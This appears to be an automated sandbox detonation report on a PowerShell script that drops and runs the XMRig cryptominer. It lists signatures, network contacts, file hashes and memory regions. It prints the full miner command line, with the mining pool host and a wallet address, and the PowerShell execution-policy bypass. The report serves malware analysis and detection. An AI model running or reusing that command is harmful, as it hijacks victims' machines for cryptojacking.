"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
memory/2468-0-0x00007FFB81333000-0x00007FFB81335000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_afjuoutj.m3e.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2468-9-0x00007FFB81330000-0x00007FFB81DF2000-memory.dmp
memory/2468-10-0x000001E7CD830000-0x000001E7CD852000-memory.dmp
memory/2468-11-0x00007FFB81330000-0x00007FFB81DF2000-memory.dmp
memory/2468-12-0x00007FFB81330000-0x00007FFB81DF2000-memory.dmp
memory/2468-14-0x000001E7CDA30000-0x000001E7CDA42000-memory.dmp
memory/2468-15-0x000001E7CDA20000-0x000001E7CDA2A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1616-46-0x0000021D631B0000-0x0000021D631D0000-memory.dmp
memory/1616-47-0x0000021D63200000-0x0000021D63220000-memory.dmp
memory/1616-48-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/2468-49-0x00007FFB81330000-0x00007FFB81DF2000-memory.dmp
memory/2468-50-0x00007FFB81333000-0x00007FFB81335000-memory.dmp
memory/1616-51-0x0000021D63220000-0x0000021D63240000-memory.dmp
memory/1616-52-0x0000021D63240000-0x0000021D63260000-memory.dmp
memory/1616-53-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-54-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-57-0x0000021D63240000-0x0000021D63260000-memory.dmp
memory/1616-56-0x0000021D63220000-0x0000021D63240000-memory.dmp
memory/1616-55-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-58-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-59-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-60-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-61-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-62-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-63-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-64-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-65-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-66-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-67-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-68-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-69-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-70-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-71-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-72-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-73-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-74-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-75-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-76-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-77-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-78-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-79-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-80-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-81-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-82-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-83-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-84-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-85-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-86-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-87-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-88-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-89-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-90-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-91-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-92-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-93-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-94-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-95-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-96-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-97-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-98-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-99-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-100-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-101-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-102-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-103-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-104-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-105-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-106-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-107-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-108-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-109-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-110-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-111-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-112-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-113-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-114-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-115-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
memory/1616-116-0x00007FF7ACFC0000-0x00007FF7ADBF3000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 17:01
Platform
win10-20240404-en
Max time kernel
1799s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1340 wrote to memory of 3636 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1340 wrote to memory of 3636 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.58.20.217.in-addr.arpa | udp |
Files
memory/1340-3-0x00007FFAA4D43000-0x00007FFAA4D44000-memory.dmp
memory/1340-5-0x00000253F7C30000-0x00000253F7C52000-memory.dmp
memory/1340-7-0x00007FFAA4D40000-0x00007FFAA572C000-memory.dmp
memory/1340-10-0x00007FFAA4D40000-0x00007FFAA572C000-memory.dmp
memory/1340-9-0x00000253F7F20000-0x00000253F7F96000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3kmmlh25.syb.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/1340-25-0x00007FFAA4D40000-0x00007FFAA572C000-memory.dmp
memory/1340-48-0x00000253F7F00000-0x00000253F7F12000-memory.dmp
memory/1340-61-0x00000253F7C80000-0x00000253F7C8A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3636-90-0x00000166E58C0000-0x00000166E58E0000-memory.dmp
memory/3636-91-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/1340-92-0x00007FFAA4D40000-0x00007FFAA572C000-memory.dmp
memory/1340-94-0x00007FFAA4D43000-0x00007FFAA4D44000-memory.dmp
memory/3636-93-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/1340-95-0x00007FFAA4D40000-0x00007FFAA572C000-memory.dmp
memory/1340-96-0x00007FFAA4D40000-0x00007FFAA572C000-memory.dmp
memory/3636-97-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-98-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-99-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-100-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-101-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-102-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-103-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-104-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-105-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-106-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-107-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-108-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-109-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-110-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-111-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-112-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-113-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-114-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-115-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-116-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-117-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-118-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-119-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-120-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-121-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-122-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-123-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-124-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-125-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-126-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-127-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-128-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-129-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-130-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-131-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-132-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-133-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-134-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-135-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-136-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-137-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-138-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-139-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-140-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-141-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-142-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-143-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-144-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-145-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-146-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-147-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-148-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-149-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-150-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-151-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-152-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-153-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-154-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-155-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-156-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
memory/3636-157-0x00007FF7244A0000-0x00007FF7250D3000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:56
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1759s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5064 wrote to memory of 4152 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 5064 wrote to memory of 4152 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
Files
memory/5064-2-0x00007FFA2DF73000-0x00007FFA2DF74000-memory.dmp
memory/5064-5-0x00000113A2FB0000-0x00000113A2FD2000-memory.dmp
memory/5064-8-0x00007FFA2DF70000-0x00007FFA2E95C000-memory.dmp
memory/5064-9-0x00000113A30E0000-0x00000113A3156000-memory.dmp
memory/5064-10-0x00007FFA2DF70000-0x00007FFA2E95C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g5k24220.1cc.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/5064-26-0x00007FFA2DF70000-0x00007FFA2E95C000-memory.dmp
memory/5064-49-0x00000113A2F50000-0x00000113A2F62000-memory.dmp
memory/5064-62-0x00000113A2F30000-0x00000113A2F3A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4152-91-0x000002001BED0000-0x000002001BEF0000-memory.dmp
memory/4152-92-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/5064-94-0x00007FFA2DF73000-0x00007FFA2DF74000-memory.dmp
memory/4152-93-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/5064-95-0x00007FFA2DF70000-0x00007FFA2E95C000-memory.dmp
memory/5064-96-0x00007FFA2DF70000-0x00007FFA2E95C000-memory.dmp
memory/4152-97-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-98-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-99-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-100-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-101-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
memory/4152-102-0x00007FF64E200000-0x00007FF64EE33000-memory.dmp
